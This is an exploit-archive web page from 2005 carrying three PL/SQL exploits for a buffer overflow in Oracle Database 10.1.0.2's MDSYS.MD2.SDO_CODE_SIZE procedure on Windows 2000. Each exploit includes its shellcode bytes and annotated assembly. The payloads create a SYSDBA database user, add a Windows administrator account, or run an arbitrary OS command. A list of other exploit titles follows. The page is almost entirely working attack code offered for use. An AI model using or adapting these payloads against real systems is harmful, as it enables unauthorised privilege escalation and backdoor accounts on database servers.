exploits , vulnerabilities , articles , Oracle Database Server "MDSYS.MD2.SDO_CODE

2005-04-13

Oracle Database Server "MDSYS.MD2.SDO_CODE_SIZE" buffer overflow Exploit

/*
Advanced SQL Injection in Oracle databases

Exploit for the buffer overflow vulnerability in procedure
MDSYS.MD2.SDO_CODE_SIZE
of Oracle Database Server version 10.1.0.2 under Windows 2000 Server SP4.
Fixes available at http://metalink.oracle.com.

The exploit creates a SYSDBA user ERIC with a password 'MYPSW12'

By Esteban Martinez Fayo
secemf@gmail.com
*/

DECLARE
a BINARY_INTEGER; -- return value
AAA VARCHAR2(32767);
BEGIN
AAA := 'AAAAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDDDDDDDDEEEEEEEE
EEEEEEEEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGGGGGG
GGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH'
|| CHR(131) || CHR(195) || CHR(9) || CHR(255) || CHR(227)
/*
83C3 09 ADD EBX,9
FFE3 JMP EBX
*/
|| CHR(251) || CHR(90) || CHR (227) || CHR(120) -- Jump to address
0x78E35AFB
/*
userenv.dll
78E35AFB 4B DEC EBX
78E35AFC FFD3 CALL EBX
*/
|| CHR(54) || CHR(141) || CHR(67) || CHR(19) || CHR(80) || chr(184) ||
chr(191) || 
chr(142) || chr(01) || chr(120) || chr(255) || chr(208) || chr(184) ||
chr(147) || 
chr(131) || chr(00) || chr(120) || chr(255) || chr(208)
/*
36:8D43 13 LEA EAX,DWORD PTR SS:[EBX+13]
50 PUSH EAX
B8 BF8E0178 MOV EAX,MSVCRT.system
FFD0 CALL EAX
B8 93830078 MOV EAX,MSVCRT._endthread
FFD0 CALL EAX
*/
|| 'echo CREATE USER ERIC IDENTIFIED BY MYPSW12; >
c:\cu.sql'||chr(38)||'
echo GRANT DBA TO ERIC; >> c:\cu.sql '||chr(38)||' echo ALTER USER
ERIC DEFAULT ROLE DBA; 
>> c:\cu.sql '||chr(38)||' echo GRANT SYSDBA TO "ERIC"
WITH ADMIN OPTION; >> 
c:\cu.sql'||chr(38)||'echo QUIT >> c:\cu.sql '||chr(38)||' 
c:\oracle\product\10.1.0\db_1\bin\sqlplus.exe "/ as sysdba"
@c:\cu.sql 1> 
c:\stdout.log 2> c:\stderr.log';
a := MDSYS.MD2.SDO_CODE_SIZE (LAYER => AAA);
END;

--------------------------------------------------------------------------------------------------------

/*
Advanced SQL Injection in Oracle databases

Exploit for the buffer overflow vulnerability in procedure
MDSYS.MD2.SDO_CODE_SIZE
of Oracle Database Server version 10.1.0.2 under Windows 2000 Server SP4.
Fixes available at http://metalink.oracle.com.

The exploit creates a Windows user ERIC with Administrator privilege.

By Esteban Martinez Fayo
secemf@gmail.com
*/

DECLARE
a BINARY_INTEGER; -- return value
AAA VARCHAR2(32767);
BEGIN
AAA := 'AAAAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDDDDDDDDEEEEEEEE
EEEEEEEEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGGGGGG
GGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH'
|| CHR(131) || CHR(195) || CHR(9) || CHR(255) || CHR(227)
/*
83C3 09 ADD EBX,9
FFE3 JMP EBX
*/
|| CHR(251) || CHR(90) || CHR (227) || CHR(120) -- Jump to address
0x78E35AFB
/*
userenv.dll
78E35AFB 4B DEC EBX
78E35AFC FFD3 CALL EBX
*/
|| CHR(54) || CHR(141) || CHR(67) || CHR(19) || CHR(80) || chr(184) ||
chr(191) 
|| chr(142) || chr(01) || chr(120) || chr(255) || chr(208) || chr(184) ||
chr(147) 
|| chr(131) || chr(00) || chr(120) || chr(255) || chr(208)
/*
36:8D43 13 LEA EAX,DWORD PTR SS:[EBX+13]
50 PUSH EAX
B8 BF8E0178 MOV EAX,MSVCRT.system
FFD0 CALL EAX
B8 93830078 MOV EAX,MSVCRT._endthread
FFD0 CALL EAX
*/
|| 'net user admin2 /add '||chr(38)||' net localgroup Administradores
admin2 /add '||chr(38)||' net localgroup ORA_DBA admin2 /add';
a := MDSYS.MD2.SDO_CODE_SIZE (LAYER => AAA);
end;

--------------------------------------------------------------------------------------------------------

/*
Advanced SQL Injection in Oracle databases

Proof of concept exploit for the buffer overflow vulnerability in
procedure MDSYS.MD2.SDO_CODE_SIZE
of Oracle Database Server version 10.1.0.2 under Windows 2000 Server SP4.
Fixes available at http://metalink.oracle.com.

By Esteban Martinez Fayo
secemf@gmail.com
*/

DECLARE
a BINARY_INTEGER; -- return value
AAA VARCHAR2(32767);
BEGIN
AAA := 'AAAAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDDDDDDDDEEEEEEEE
EEEEEEEEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGGGGGGG
GGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH'
|| CHR(131) || CHR(195) || CHR(9) || CHR(255) || CHR(227)
/*
83C3 09 ADD EBX,9
FFE3 JMP EBX
*/
|| CHR(251) || CHR(90) || CHR (227) || CHR(120) -- Jump to address
0x78E35AFB
/*
userenv.dll
78E35AFB 4B DEC EBX
78E35AFC FFD3 CALL EBX
*/
|| CHR(54) || CHR(141) || CHR(67) || CHR(19) || CHR(80) || chr(184) ||
chr(191) || chr(142) 
|| chr(01) || chr(120) || chr(255) || chr(208) || chr(184) || chr(147) ||
chr(131) || 
chr(00) || chr(120) || chr(255) || chr(208)
/*
36:8D43 13 LEA EAX,DWORD PTR SS:[EBX+13]
50 PUSH EAX
B8 BF8E0178 MOV EAX,MSVCRT.system
FFD0 CALL EAX
B8 93830078 MOV EAX,MSVCRT._endthread
FFD0 CALL EAX
*/
|| 'dir>c:\dir.txt'; -- OS command to execute
a := MDSYS.MD2.SDO_CODE_SIZE (LAYER => AAA);
END;
securitydot.net - 2005-04-13

Exploits - newest 10 RSS | More

2007-06-15 57030 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34049 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42190 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29221 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19650 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16611 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19306 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16478 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33472 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17136 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit

exploits , vulnerabilities , articles , Oracle Database Server "MDSYS.MD2.SDO_CODE_SIZE" buffer overflow Exploit